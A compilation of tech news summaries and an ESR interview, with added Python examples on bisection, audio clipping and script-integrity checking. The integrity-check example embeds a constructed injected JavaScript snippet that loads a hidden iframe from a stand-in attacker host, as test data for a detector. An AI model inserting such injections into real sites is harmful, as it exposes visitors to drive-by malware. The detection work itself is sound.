HughPickens.com writes: If Google sees that you're searching for specific programming terms, they may ask you to apply for a job as Max Rossett writes that three months ago while working on a project, he Googled "python lambda function list comprehension." The familiar blue links appeared on the search page, and he started to look for the most relevant one. But then something unusual happened. The search results split and folded back to reveal a box that said "You're speaking our language. Up for a challenge?" Clicking on the link took Rossett to a page called "foo.bar" that outlined a programming challenge and gave instructions on how to submit his solution. "I had 48 hours to solve it, and the timer was ticking," writes Rossett. "I had the option to code in Python or Java. I set to work and solved the first problem in a couple hours. Each time I submitted a solution, foo.bar tested my code against five hidden test cases."
After solving another five problems the page gave Rossett the option to submit his contact information and much to his surprise, a recruiter emailed him a couple days later asking for a copy of his resume. Three months after the mysterious invitation appeared, Rossett started at Google. Apparently Google has been using this recruiting tactic for some time. -
Lenovo Installed Software On Laptops That Persisted After Complete Wipes
An anonymous reader writes: The Next Web has confirmed reports from owners of Lenovo laptops that the company used a BIOS feature to install its software on the laptops even if a user wiped a device clean and reinstalled the operating system. "If Windows 7 or 8 is installed, the BIOS of the laptop checks 'C:\Windows\system32\autochk.exe' to see if it's a Microsoft file or a Lenovo-signed one, then overwrites the file with its own. Then, when the modified autochk file is executed on boot, another two files LenovoUpdate.exe and LenovoCheck.exe are created, which set up a service and download files when connected to the internet." Lenovo has published a patch to remove this functionality. The article notes that this technique seems to be sanctioned by a Microsoft policy. "Manufacturers are obligated to ensure that the mechanism can be updated if an attack is discovered and should be removable by the user, but the rules outlined in the document are fairly loose and don't require the OEM to notify the owner of the laptop that such a mechanism is in place." -
Mozilla Responds To Firefox User Backlash Over Pocket Integration
An anonymous reader writes: Last week, Mozilla updated Firefox to add Pocket integration — software that lets you save web articles to read later. Over the weekend, some Firefox users began to voice their displeasure over the move on public forums like Bugzilla, Google Groups, and Hacker News. The complaints center around Pocket being a proprietary third-party service, which already exists as an add-on, and is not a required component for a browser. Integrating Pocket directly into Firefox means it cannot be removed, only disabled. In response, Mozilla has released a statement saying users like the integration and the integration code is open source. -
Why Companies Should Hire Older Developers
Nerval's Lobster writes: Despite legislation making it overtly illegal, ageism persists in the IT industry. If you're 40 or older, you've probably seen cases where younger developers were picked over older ones. At times we're told there's a staffing crisis, that companies need to import more developers via H-1B, but the truth is that outsourcing and downsizing eliminated a subset of viable developers from the market. Those developers, in turn, had to figure out if they wanted to land another job, freelance, or leave the technology industry entirely. But older developers still have a lot to offer, developer David Bolton writes in a new column: They have decades of experience (and specialist knowledge), they have a healthy disregard for office politics (but can still manage, when necessary), they're available, and they're (generally) stable. -
Nim Programming Language Gaining Traction
An anonymous reader writes: Nim is a young, statically typed programming language that has been getting more attention recently. See these articles for an introduction: What is special about Nim?, What makes Nim practical? and How I Start: Nim. The language offers a syntax inspired by Python and Pascal, great performance and C interfacing, and powerful metaprogramming capabilities. The author of "Unix in Rust" just abandoned Rust in favor of Nim and some early-adopter companies are starting to use it as well. -
Docker Image Insecurity
An anonymous reader writes Developer Jonathan Rudenberg has discovered and pointed out a glaring security hole in Docker's system. He says, "Recently while downloading an 'official' container image with Docker I saw this line: ubuntu:14.04: The image you are pulling has been verified
I assumed this referenced Docker's heavily promoted image signing system and didn't investigate further at the time. Later, while researching the cryptographic digest system that Docker tries to secure images with, I had the opportunity to explore further. What I found was a total systemic failure of all logic related to image security.
Docker's report that a downloaded image is 'verified' is based solely on the presence of a signed manifest, and Docker never verifies the image checksum from the manifest. An attacker could provide any image alongside a signed manifest. This opens the door to a number of serious vulnerabilities." Docker's lead security engineer has responded here. -
How Whisper Tracks Users Who Don't Share Their Location
blottsie (3618811) writes "On Thursday, the Guardian reported that secret-sharing app Whisper was tracking users' locations even when they opt-out of sharing their location. [See also this earlier, related story.] Whisper has denied the accusations—but this may be a matter of semantics. Whisper allegedly uses an outdated version of GeoIP by MaxMind, which uses your IP address to estimate your location on a map. Whisper's Chad DePue said in a comment on Hacker News that the tool is "so inaccurate as to be laughable," suggesting that determining something as broad as your country or state won't bother the basic user (and he could be right, but what is and isn't an upsetting degree of user information is another argument entirely)." -
Russia Cracks Down On Public Wi-Fi; Oracle Blocks Java Downloads In Russia
Linking to a story at Reuters, reader WilliamGeorge writes "Russia is further constraining access to the internet and freedom of speech, with new laws regarding public use of WiFi. Nikolai Nikiforov, the Russian Communications Minister, tweeted that "Identification of users (via bank cards, cell phone numbers, etc.) with access to public Wifi is a worldwide practice." This comes on top of their actions recently to block websites of political opponents to Russian president Vladimir Putin, require registration of prominent bloggers, and more. The law was put into effect with little notice and without the input of Russian internet providers. Sergei Plugotarenko, head of the Russian Electronic Communications Association, said "It was unexpected, signed in such a short time and without consulting us." He added, "We will hope that this restrictive tendency stops at some point because soon there won't be anything left to ban." In addition to the ID requirement to use WiFi, the new law also requires companies to declare who is using their web networks and calls for Russian websites to store their data on servers located in Russia starting in 2016." That's not the only crackdown in progress, though: former Slashdot code-wrestler Vlad Kulchitski notes that Russian users are being blocked from downloading Java with an error message that reads, in essence, "You are in a country on which there is embargo; you cannot download JAVA." Readers at Hacker News note the same, though comments there indicate that the block may rely on a "specific and narrow IP-block," rather than being widespread. If you're reading this from Russia, what do you find? -
Google Forks OpenSSL, Announces BoringSSL
An anonymous reader writes Two months after OpenBSD's LibReSSL was announced, Adam Langley introduces Google's own fork of OpenSSL, called BoringSSL. "[As] Android, Chrome and other products have started to need some subset of these [OpenSSL] patches, things have grown very complex. The effort involved in keeping all these patches (and there are more than 70 at the moment) straight across multiple code bases is getting to be too much. So we're switching models to one where we import changes from OpenSSL rather than rebasing on top of them. The result of that will start to appear in the Chromium repository soon and, over time, we hope to use it in Android and internally too." First reactions are generally positive. Theo de Raadt comments, "Choice is good!!." -
Interviews: ESR Answers Your Questions
Last week you had the chance to ask ESR about books, guns, and open source software. Below you'll find his answers to those questions.
What about protocols?
by Anonymous Coward
What are your feelings about protocols and file formats and keeping them open? Where do the efforts to keep protocols and file formats open and accessible to others fall on your list of priorities?
ESR: I don't think my answer will surprise you. When the function of software is defined by a requirement to be compatible with a protocol or file format, openness of the protocol or formats is even more important than the licensing status of any of the implementations around it.
The reason should be obvious. If the protocol is well documented and open, you can build open-source code to process it. On the other hand, if crucial parts are undocumented or (worse) require techniques that are under a non-royalty-free patent, *any* code touching it can have a serious problem.
There's a productive analogy with DNA and ribosomes here which I leave for the reader to fill in.
systemd
by Canek
As a long time "Unix philosophy" advocate, and in the light of the announced switch to it by Debian, Ubuntu, and basically every other major Linux distribution, what do you think of systemd, and the tight vertical integration it intends to bring as a standard plumbing for (most of) all Linux distributions?
ESR: I apologize; I haven't studied systemd in the detail that would be required for me to give a firm answer to this - it's been on my to-do list for a while, but I'm buried in other projects.
I want to study it carefully because I'm a bit troubled by what I hear about the feature set and the goals. From that, I fear it may be one of those projects that is teetering right at the edge of manageable complexity - OK as long as an architect with a strong sense of design discipline is running things, but very prone to mission creep and bloat and likely to turn into a nasty hairball over the longer term.
But this may be me being too pessimistic. I don't actually think I know yet.
here's an obvious one..
by Connie_Lingus
It's been almost 20 years since you wrote CatB... I gave it a quick read and thought, "well, it *is* dated now, isn't it?" although I am old enough to remember when its ideas were pretty cutting edge. Given the current state of software development (i.e. the ease of use of PHP and the fact that, without a doubt, the cathedral model has won), what would you either like to change or add to your original thesis?
ESR: Um. What color is the sky on your planet? The one where the cathedral model has won, I mean.
What's happening on Earth is just the opposite - even where bazaar-mode development hasn't taken over, many organizations that would previously have run their projects in a cathedral style are trying really hard to flatten out hierarchies, lighten up, and co-opt the many-eyeballs effect in any way they can. This is pretty clear just from what shows up in my mailbox - and see my later response to a question about Apple, too.
I think there have been some significant shifts in methodology that would affect the book if I were writing it today. A big one is that systematic use of version control is now pervasive in a way it was not then (when CatB was written, Subversion wasn't out of early alpha stage yet; git and hg weren't even imagined). Development workflow is now correspondingly much more centered around shared public repositories.
The effects of always being able to revert to known codebase states rapidly are subtle but very large. One obvious one is that the risk factor of exploration drops significantly. That includes the risk in taking patches from strangers.
Less obvious but just as important is how sharp version-control tools raise the effectiveness and reduce the friction cost of testing techniques. In 2001 we couldn't routinely run bisections to pinpoint bad code changes; our tools were too slow and clumsy. Now we can, and the effect is to make building good unit and regression-test suites both easier and more rewarding in defects squashed per hours invested.
The reason I'm going on about this is that, like any technique that increases our visibility into the code's behavioral space, better test suites tremendously amplify the positive effects of code review. Of course that feeds through into a differential competitive advantage for open source, because our process naturally recruits more code reviewers than closed-source shops can usually afford to hire.
Here's an example of the effect. There's a project I've led since about 2005 called GPSD, a service daemon that handles GPSes and other geodetic sensors. It's *everywhere* in mobile embedded systems, including your Android phone - we must have well over a billion deployments by now. Yet our defect rate is so low that months go by at a time between single bug reports.
Why? Because I wrote a test suite with good coverage - and use a test strategy that relies on fast rollback capabilities I plain didn't have before modern version control. Changes in tools change the rules. It's much easier to get to the this-never-breaks level of reliability than it was when I wrote CatB, if you know what you're doing.
(For much more on this case study see my paper on the architecture of GPSD; there's a major section on engineering for high reliability.)
Open-source development has quite a few advantages over closed in exploiting this possibility - better tools, healthier culture, and just plain more developers. I think a major theme of the next decade is going to be learning to systematically capture these gains.
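The bisection ESR refers to above, as an added worked example for this page (not code from GPSD or any of his projects): a binary search over a commit history that pinpoints the first bad change in O(log n) test runs instead of testing every revision. The history, the bug-introducing commit and `regression_test` are all constructed; in practice `regression_test` is the checkout-and-run-the-suite step that `git bisect run` performs for you.

```python
from typing import Callable, List, Tuple

# Constructed history: 16 commits in order, with a (hypothetical) regression
# introduced at c11. Nothing here is a real repository.
HISTORY = [f"c{i:02d}" for i in range(1, 17)]
BUG_INTRODUCED_AT = "c11"


def regression_test(commit: str) -> bool:
    """Stand-in for 'check out this revision and run the test suite'.
    Returns True when the suite FAILS at that revision (i.e. the commit is bad)."""
    return HISTORY.index(commit) >= HISTORY.index(BUG_INTRODUCED_AT)


def bisect_first_bad(commits: List[str], is_bad: Callable[[str], bool]) -> Tuple[str, int]:
    """Return (first bad commit, number of test runs used).

    commits must be in history order. Like `git bisect`, this relies on the
    test being monotonic: every commit after the first bad one is also bad.
    The two endpoints are checked first, exactly as `git bisect good/bad`
    requires, so a flaky or mis-specified range fails loudly here instead
    of producing a confidently wrong answer.
    """
    runs = 0

    def test(c: str) -> bool:
        nonlocal runs
        runs += 1
        return is_bad(c)

    if test(commits[0]):
        raise ValueError("oldest commit already fails; widen the range")
    if not test(commits[-1]):
        raise ValueError("newest commit passes; nothing to bisect")

    lo, hi = 0, len(commits) - 1  # invariant: commits[lo] good, commits[hi] bad
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if test(commits[mid]):
            hi = mid  # bug is at or before mid
        else:
            lo = mid  # bug is after mid
    return commits[hi], runs


if __name__ == "__main__":
    culprit, runs = bisect_first_bad(HISTORY, regression_test)
    print(f"first bad commit: {culprit} after {runs} test runs "
          f"(a linear scan would need up to {len(HISTORY)})")
```

The count matters for ESR's point: with 16 commits the search above costs 6 test runs (two endpoint checks plus four halvings), and the cost grows only logarithmically, which is what makes a slow-but-thorough regression suite affordable to run at every step.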
How to ask questions
by houstonbofh
When you wrote "How to ask questions" did you have any idea how big it would be? Or how long it would be relevant? And how do you feel that your most referenced piece of work is a howto for the clueless? :)
ESR: I'm not sure it is my most referenced piece of work. Either "How To Become A Hacker" or the Jargon File could easily be getting more hits; I haven't bothered to track this.
But supposing it is, that's OK. I expect it to be relevant for a very long time, because the newbies and the clueless are always with us.
Halloween Documents
by frdmfghtr
I recall reading (and re-reading on occasion) the Halloween Documents. Have you written anything regarding any other opponents to OSS, or perhaps a look back on them and see what the end effect of Microsoft's attempts did long term?
ESR: I haven't written a retrospective, or anything else really similar.
I think those documents had a pretty significant effect in legitimizing not buying the Microsoft lock-in. The trade press certainly thought so at the time, and the intervening decade and a half hasn't given me any reason to suppose they were wrong.
How essential is software redistribution rights?
by unixisc
One of the issues w/ Open Source has been the freedom to redistribute software downstream - be it just binaries, just source or any combination of the 2. Do you think there are any good ways for software companies who make their software open source to prevent their customers from effectively becoming their competitors - by giving away or selling cheaper what they were sold? Or is the only alternative going for a shared-source approach, as opposed to open source, where redistribution can be explicitly prohibited?
ESR: If your customers are selling your open-source software for a lower price than you are, then you're doing it wrong! You need to face the question of why you've attached a sales price to the software itself at all. I think that's a doomed approach.
You need to be thinking about monetizing that investment in a different way. The most obvious is service and consulting contracts around the code. You have the advantage there; as the originators, you are in a better position to add value to the bundle than your competitors are.
There are a couple other potential business models here, but none I can recommend without knowing more details about your situation. My advice in The Magic Cauldron is still quite relevant.
What about the new wave of proprietary programs
by necro351
So it seems these days the most effective method of DRM is a network interface, like that used by Facebook, Google, Pinterest, etc... You cannot run your own instance of Gmail or Facebook, and you certainly cannot see or modify the code. At the same time all these companies are pressuring us to push our data into their servers by not supporting or coming up with solutions that let us continue to control/manage our data on our own machines and private networks. What can open source do to stem that tide? What about open source licensing? Could webkit or Mozilla have slowed down the encroachment of Chrom/ium and its pro-Google agenda if it had more defensive licensing terms like something similar to the GPL? How do we convince hackers to hack on open-source 'website programs', like an open Gmail or an open Facebook (e.g., Diaspora)?
ESR: You're pointing at a real problem. I don't know of any near-term solutions beyond being very careful what services you allow to draw you into their web. I run my own mailserver, rather than using GMail, for exactly this reason. I don't use Facebook or Pinterest. I use G+ for nonessential things only.
I don't think defensive or reciprocal licensing can solve the problem, because it is not one created by code secrecy. The service providers are trading on real advantages of scale that they would still collect if every line of source code in their app stack were public; the value they're offering actually comes from ubiquity and synergy.
In fact I'm a little surprised they even bother maintaining code secrecy, it has nothing whatsoever to do with their value proposition. I think we're seeing a result of instinctive territoriality rather than rational thought.
I'd love to believe that projects like Diaspora are a long-term solution to the problem, but I don't - basically because no matter how attractive and ingenious your software is, it takes gobs of capital expenditure on server farms to scale up to where you're any kind of functional competition to Facebook/Google/Pinterest etc.
In the long term I think the way we'll win is if the giants have to compete with each other for business by giving their customers exit and recovery options. Google's Data Liberation Front is a positive early sign.
Linus's Law (Many Eyes) Problems
by carp3_noct3m
Hi, there is currently some debate about the many eyes theory over on HNews about why it's a fallacious argument, but in my view they have it all wrong, in that a core component of Linus's Law is that the amount of code is directly inverse to the amount of eyes that can hit all of that code (or a significant percentage). Therefore, in my eyes it is the problem of code bloat that is undermining the open source movement more than anything. For example, the Linux kernel is now at, what, 10mil+ lines of code? That's insane. Minix 3, on the other hand, is at ~15k?
What are your thoughts on this problem?
ESR: I think you raise a valid point about code bloat being a problem. On the other hand, the code-coverage effectiveness of individual developers is also rising for reasons I wrote about in response to a previous question - better tools and better testing strategies feeding back on each other in virtuous ways.
A lot of criticisms of Linus's Law (including the Hacker News thread, as far down as I read it) miss the point that "many eyeballs" isn't just about sheer volume of people reviewing code, it's about diversity of assumptions. You want people reviewing the code that don't all work for the same company and report to the same boss - people who speak different languages, different toolkits, different expertise areas.
A handful of people who think very differently may be more effective auditors than an army with identical blind-spots. By recruiting more people you're maximizing the odds of good diversity in the subgroup that actually reviews any given section of code.
I actually chuckled when I read the Hacker News thread, because I've seen this movie before after every serious security flap in an open-source tool. The script, which includes a bunch of people indignantly exclaiming that many-eyeballs is useless because bug X lurked in a dusty corner for Y months, is so predictable that I can anticipate a lot of the lines.
The mistake being made here is a classic example of Frederic Bastiat's things seen versus things unseen. Critics of Linus's Law overweight the bug they can *see* and underweight the high probability that equivalently positioned closed-source security flaws they *can't* see are actually far worse, just so far undiscovered.
That's how it seems to go whenever we get a hint of the defect rate inside closed-source blobs, anyway. As a very pertinent example, in the last couple months I've learned some things about the security-defect density in proprietary firmware on residential and small business Internet routers that would absolutely curl your hair. It's far, far worse than most people understand out there.
Friends don't let friends run factory firmware. You really do *not* want to be relying on anything less audited than OpenWRT or one of its kindred (DDWRT, or CeroWRT for the bleeding edge). And yet the next time any security flaw turns up in one of those open-source projects, we'll see a replay of the movie with yet another round of squawking about open source not working.
Ironically enough this will happen precisely because the open-source process *is* working ... while, elsewhere, bugs that are *far* worse lurk in closed-source router firmware. Things seen vs. things unseen...
Apple today
by wordtech
Your comments in The Art of Unix Programming about Apple/Mac developers being diametrically opposed to Unix developers in development style and emphases (designing simple, user-friendly interfaces from the outside in) were quite interesting. I am wondering about your perspective on Apple now. My interest is specifically in Apple's contributions to open-source (WebKit and LLVM, chiefly) and your take on those. It seems to me that Apple has done quite a bit to foster an alternative ecosystem to the GNU environment, for instance in FreeBSD's adoption of clang as their default compiler; and also it seems to to me that WebKit has supplanted Gecko as the most widely used browser framework. Curious about your viewpoint here.
ESR: In answering an earlier question I spoke of organizations that would previously have developed in a secretive cathedral mode adopting the bazaar model and open-source practices. Projects like LLVM and Webkit exemplify this trend.
The interesting thing about these projects is that they're not just facades. They really seem to welcome, not just as outside contributors but sometimes as full-time employees, people who are from the Unix-descended open-source culture (with its inside-to-out priorities) rather than interface-centric Mac guys.
That - and of course, OS X - tells us Apple's technical culture isn't what it used to be. It's more Unix-influenced now, more open, has more hacker in it. Obviously that doesn't fix every problem with Apple - I'm with RMS in judging the locked-down, walled-garden design of their phones and tablets to be a very bad thing for users in the longer term - but it's movement in a good direction.
AK or AR
by gmhowell
Which is the better battle rifle, an AK-47/74 type or an AR-15/M-16/M-4 type? Please give your criteria as well as your answer. Bonus: favorite handgun platform/caliber that isn't a .45 1911.
ESR: "Better battle rifle" depends on who you're equipping, and for what. I lean towards the AR-15 because I'm from a culture that readily produces people with good marksmanship, fire discipline, and steadiness under combat pressure. The AR-15 is the better weapon to match those traits - it rewards skill in the shooter and you can actually use it at distance.
On the other hand, if your troops are savages or bandits who can barely clean a weapon and for whom the natural mode is short-range spray'n'pray, the AK-47 is probably a better choice. It hardly rewards shooter skill at all, but handles egregious abuse under field conditions better.
As for what I like when I don't have .45ACP handy, my answer is easy and boring: .40S&W. Medium-caliber semis suit me very well. I don't mind shooting my wife's Glock .40 at all, and it's likely what I'd carry if not for John Moses Browning (peace be unto him) -
Customer: Dell Denies Speaker Repair Under Warranty, Blames VLC
An anonymous reader writes "VLC is incapable of increasing the actual power past 100%; all that is being done is that the waveform is being modified to be louder within the allowed constraints. But that didn't stop Dell from denying warranty service for speaker damage if the popular VLC Media Player is installed on a Dell laptop. Also we got a report that service was denied because KMPlayer was installed on a laptop. The warranty remains valid on the other parts of the laptop. VLC player developer [Jean-Baptiste Kempf] denied the issue with VLC and further claimed that the player cannot be used to damage speakers. How can I convince Dell to replace my laptop speaker which is still in warranty? Or is a class action my only option?"
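An added example, written for this page and not taken from the submission or from VLC's code, of what a software volume control above 100% does to 16-bit PCM. It assumes symmetric clipping at ±32767 and uses a constructed sine test tone. It confirms the submitter's premise about peak amplitude: no sample can exceed full scale, so the player cannot raise the peak past what a 100% signal already produces. The caveat a practitioner will want is also visible in the numbers: the clipped waveform's RMS rises toward that of a square wave, so at 2x gain the average power is roughly 56% higher than the clean full-scale tone. "No more than 100%" is a statement about peak, not about average power; whether that matters for a particular laptop's amplifier and driver is a hardware question the submission does not settle.

```python
import math
from typing import List, Tuple

# Largest magnitude a 16-bit PCM sample can hold; clipping is applied
# symmetrically here (an assumption; real decoders clip the negative side at -32768).
FULL_SCALE = 32767


def sine_pcm(peak: float, n: int = 1000, cycles: int = 10) -> List[int]:
    """Constructed test tone: `cycles` full periods of a sine, sampled `n` times."""
    return [int(round(peak * math.sin(2 * math.pi * cycles * i / n))) for i in range(n)]


def apply_gain(samples: List[int], gain: float) -> List[int]:
    """Software volume: scale every sample, then clip to the 16-bit range.
    Above 100% this is all a player can do; the container cannot hold a larger value."""
    out = []
    for s in samples:
        v = int(round(s * gain))
        out.append(max(-FULL_SCALE, min(FULL_SCALE, v)))
    return out


def peak(samples: List[int]) -> int:
    return max(abs(s) for s in samples)


def rms(samples: List[int]) -> float:
    """Root-mean-square amplitude; average power is proportional to its square."""
    return math.sqrt(sum(s * s for s in samples) / len(samples))


def compare(gain: float) -> Tuple[int, float, float]:
    """Peak and RMS of a full-scale tone after `gain`, and the power ratio
    (RMS squared) relative to the unclipped full-scale tone."""
    tone = sine_pcm(FULL_SCALE)
    boosted = apply_gain(tone, gain)
    return peak(boosted), rms(boosted), (rms(boosted) / rms(tone)) ** 2


if __name__ == "__main__":
    for g in (1.0, 2.0, 4.0):
        p, r, ratio = compare(g)
        print(f"gain {g:>3}: peak={p:5d}  rms={r:8.1f}  power x{ratio:.2f}")
```

At gain 1.0 the ratio is exactly 1; at 2.0 the peak is still 32767 but the power ratio is about 1.56; at very high gain the output approaches a full-scale square wave, whose RMS equals the peak, i.e. twice the power of the full-scale sine.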
Former Dev Gives Gloomy Outlook On Linux Support For the Opera Browser
An anonymous reader writes: "It doesn't take a Columbo to figure out that the 'previous employer, a small browser vendor that decided to abandon its own rendering engine and browser stack' is referring to Opera in this comment answering the question 'Do you actually use the product you are working on?' It appears to originate from Andreas Tolfsen, a former Opera developer who is now part of the Mozilla project. After releasing a unified-architecture browser with Linux support since 2001, Opera decided to put Linux development on indefinite hold, communicated through blog comments, and focus on Windows and Mac for their browser rewrite centered around the Blink engine that had its first beta release last spring. The promise to bring back the Linux version in due time was met with growing skepticism as the months went by, and clear answers have been avoided in the developer blog. The uncertainty has spawned user projects such as Otter browser in an attempt to recreate the Opera UI in a free application. Tolfsen's statement seems to be in line with what users have suspected all along: Opera for Linux is not something for the near future."
FreeBSD 10.0 Released
An anonymous reader writes "FreeBSD 10.0 has been released. A few highlights include: pkg is now the default package management utility. Major enhancements in virtualization, including the addition of bhyve, virtio, and native paravirtualized drivers providing support for FreeBSD as a guest operating system on Microsoft Hyper-V. Support for the high-performance LZ4 compression algorithm has been added to ZFS and TRIM support for SSD has been added to ZFS. clang is the default compiler. This release has official Raspberry Pi support. For a complete list of new features and known problems, please see the online release notes and a quick FreeBSD installation video is here. FreeBSD 10.0-RELEASE may be downloaded via ftp or via a torrent client that supports web seeding."
Dart 1.0 Released
stoolpigeon writes "Yesterday marked the release of Dart SDK 1.0, a cross-browser, open source toolkit for structured web applications. The Dart SDK 1.0 includes everything you need to write structured web applications: a simple yet powerful programming language, robust tools, and comprehensive core libraries. The language has been somewhat controversial, but Google continues to move it forward." Reader slack_justyb adds some more detail: "The new release brings a much tighter dart2js compiler reducing overall JavaScript output up to 40%; Dartium — a version of Google Chrome that has the DartVM in addition to the JavaScript VM as native to the browser; pub, a package manager for Dart add-ons; and several favorite 3rd party plug-ins that now come out-of-box, in addition to a lot of work for Dart server-side tools that can work to automate server side tasks and help in the construction of web pages. However Dart has many critics not only from the IE and Apple camps, as one would guess, but from the Firefox and Opera camps as well. In addition to the low adoption of Dart from third parties there are some asking where does Dart go from here? Especially considering that Google is one of the strongest pushers for EcmaScript 6."
A MathML Progress Report: More Light Than Shadow
An anonymous reader writes "Recent reports of MathML's demise have been greatly exaggerated. Given the amount of marketing dollars companies like Apple, Google, and Microsoft have spent trying to convince a buying public to purchase their wares as educational tools, you'd think they'd deliver more than lip service by now. MathJax team member Peter Krautzberger has compiled a great overview of the current state of MathML, the standard for mathematical content in publishing work flows, technical writing, and math software: '20 years into the web, math and science are still second class citizens on the web. While MathML is part of HTML 5, its adoption has seen ups and downs but if you look closely you can see there is more light than shadow and a great opportunity to revolutionize educational, scientific and technical communication.'"
PHP.net Compromised
An anonymous reader writes "The open source PHP project site was compromised earlier today. The site appears to have been compromised and had some of its Javascript altered to exploit vulnerable systems visiting the website. Google's stop-badware system caught this as well and flagged php.net as distributing malware, warning users whose browsers support it not to visit the site. The comment by a Google employee over at the hacker news thread (official Google webmaster forum thread) seems to suggest that php.net wasn't incorrectly flagged." -
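An added example, written for this page and not php.net's own tooling, of the out-of-band integrity check that catches the class of compromise described above: record a digest of every script as deployed, re-fetch the served copies from outside later, and flag any that differ, then show the analyst the lines that appeared. Digests use the same `<algo>-<base64>` format as the HTML `integrity=` attribute so the baseline can double as SRI values. The script body and the injected lines are constructed for the example; the host name is an RFC 2606 reserved name and resolves to nothing.

```python
import base64
import difflib
import hashlib
from typing import Dict, List, Tuple

# Constructed sample data (not the real php.net files): the script as recorded
# at deploy time, keyed by URL path.
KNOWN_GOOD: Dict[str, str] = {
    "/js/common.js": (
        "function initNav() {\n"
        "  var links = document.querySelectorAll('nav a');\n"
        "  for (var i = 0; i < links.length; i++) { links[i].rel = 'noopener'; }\n"
        "}\n"
    ),
}

# Hypothetical injection appended to the copy the site later served. The
# pattern (a 1x1 iframe to a third-party host) is illustrative only.
INJECTED = (
    "var f = document.createElement('iframe');\n"
    "f.src = 'http://attacker.example.invalid/x'; f.width = 1; f.height = 1;\n"
    "document.body.appendChild(f);\n"
)
SERVED_TAMPERED: Dict[str, str] = {
    "/js/common.js": KNOWN_GOOD["/js/common.js"] + INJECTED,
}


def sri_digest(body: str, algo: str = "sha256") -> str:
    """Digest in the form the HTML integrity= attribute uses: '<algo>-<base64 raw digest>'."""
    raw = hashlib.new(algo, body.encode("utf-8")).digest()
    return f"{algo}-{base64.b64encode(raw).decode('ascii')}"


def baseline(files: Dict[str, str]) -> Dict[str, str]:
    """Snapshot taken at deploy time and stored somewhere the web host cannot write."""
    return {path: sri_digest(body) for path, body in files.items()}


def verify(expected: Dict[str, str], served: Dict[str, str]) -> List[Tuple[str, str]]:
    """Compare served bodies against the baseline; return (path, problem) per deviation."""
    problems: List[Tuple[str, str]] = []
    for path, digest in expected.items():
        if path not in served:
            problems.append((path, "missing"))
        elif sri_digest(served[path]) != digest:
            problems.append((path, "digest mismatch"))
    for path in served:
        if path not in expected:
            problems.append((path, "not in baseline"))
    return problems


def added_lines(old: str, new: str) -> List[str]:
    """Lines present in the served copy but not in the baseline copy."""
    diff = difflib.unified_diff(old.splitlines(), new.splitlines(), lineterm="", n=0)
    return [line[1:] for line in diff if line.startswith("+") and not line.startswith("+++")]


if __name__ == "__main__":
    base = baseline(KNOWN_GOOD)
    print("clean copy:", verify(base, KNOWN_GOOD) or "ok")
    for path, why in verify(base, SERVED_TAMPERED):
        print(f"{path}: {why}")
        for line in added_lines(KNOWN_GOOD[path], SERVED_TAMPERED[path]):
            print("  +", line)
```

The design choice worth noting: an `integrity=` attribute inside the site's own pages only protects against a tampered copy served from somewhere else; once an attacker can rewrite the site's files, they can rewrite the attribute too. The baseline therefore has to live, and the re-fetch has to run, outside the compromised host, which is also why a third party's scanner (as with Google's malware flag in the story) often notices first.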
CoreText Font Rendering Bug Leads To iOS, OS X Exploit
redkemper writes with this news from BGR.com (based on a report at Hacker News), excerpting: "Android might be targeted by hackers and malware far more often than Apple's iOS platform, but that doesn't mean devices like the iPhone and iPad are immune to threats. A post on a Russian website draws attention to a fairly serious vulnerability that allows nefarious users to remotely crash apps on iOS 6, or even render them unusable. The vulnerability is seemingly due to a bug in Apple's CoreText font rendering framework, and OS X Mountain Lion is affected as well." -
Chrome's Insane Password Security Strategy
jones_supa writes "One day web developer Elliott Kember decided to switch from Safari to Chrome and in the process discovered a possibly serious weakness in local password management in Chrome. The settings import tool forced the passwords to be always imported, which led Kember to further investigate how the data can be accessed. For those who actually bother to look at the 'Saved passwords' page, it turns out that anyone with physical access can peek at all the passwords in clear text very easily with a couple of mouse clicks. This spurred a lengthy discussion featuring Justin Schuh, the head of Chrome security, who says Kember is wrong and that this behavior of Chrome has been evaluated for years and is not going to change."
Microsoft Developer Explains Why Windows Kernel Development Falls Behind
New submitter mha writes "In a response that truly seems to be from a core Microsoft developer, we are told why Windows kernel development continues to fall further and further behind that of the Linux kernel. He says, 'The cause of the problem is social. There's almost none of the improvement for its own sake, for the sake of glory, that you see in the Linux world. ... There's no formal or informal program of systemic performance improvement. We started caring about security because pre-SP3 Windows XP was an existential threat to the business. Our low performance is not an existential threat to the business. See, component owners are generally openly hostile to outside patches: if you're a dev, accepting an outside patch makes your lead angry (due to the need to maintain this patch and to justify it in shiproom as an unplanned design change), makes test angry (because test is on the hook for making sure the change doesn't break anything, and you just made work for them), and PM is angry (due to the schedule implications of code churn). There's just no incentive to accept changes from outside your own team. You can always find a reason to say "no," and you have very little incentive to say "yes."'"
Apple Hides Samsung Apology So It Can't Be Seen Without Scrolling
An anonymous reader writes "Apple today posted its second Samsung apology to its UK website, complying with requests by the UK Court of Appeal to say its original apology was inaccurate and link to a new statement. As users on Hacker News and Reddit point out, however, Apple modified its website recently to ensure the message is never displayed without visitors having to scroll down to the bottom first." -
Ex-Sun Employees Are Taking Java To iOS
An anonymous reader writes "Ex-Sun employees did what Sun/Oracle failed to do since the iPhone launched. They brought Java to iOS and other mobile devices. They are getting major coverage from Forbes, DDJ, Hacker News and others. They are taking a unique approach of combining a Swing-like API with an open source and SaaS based solution."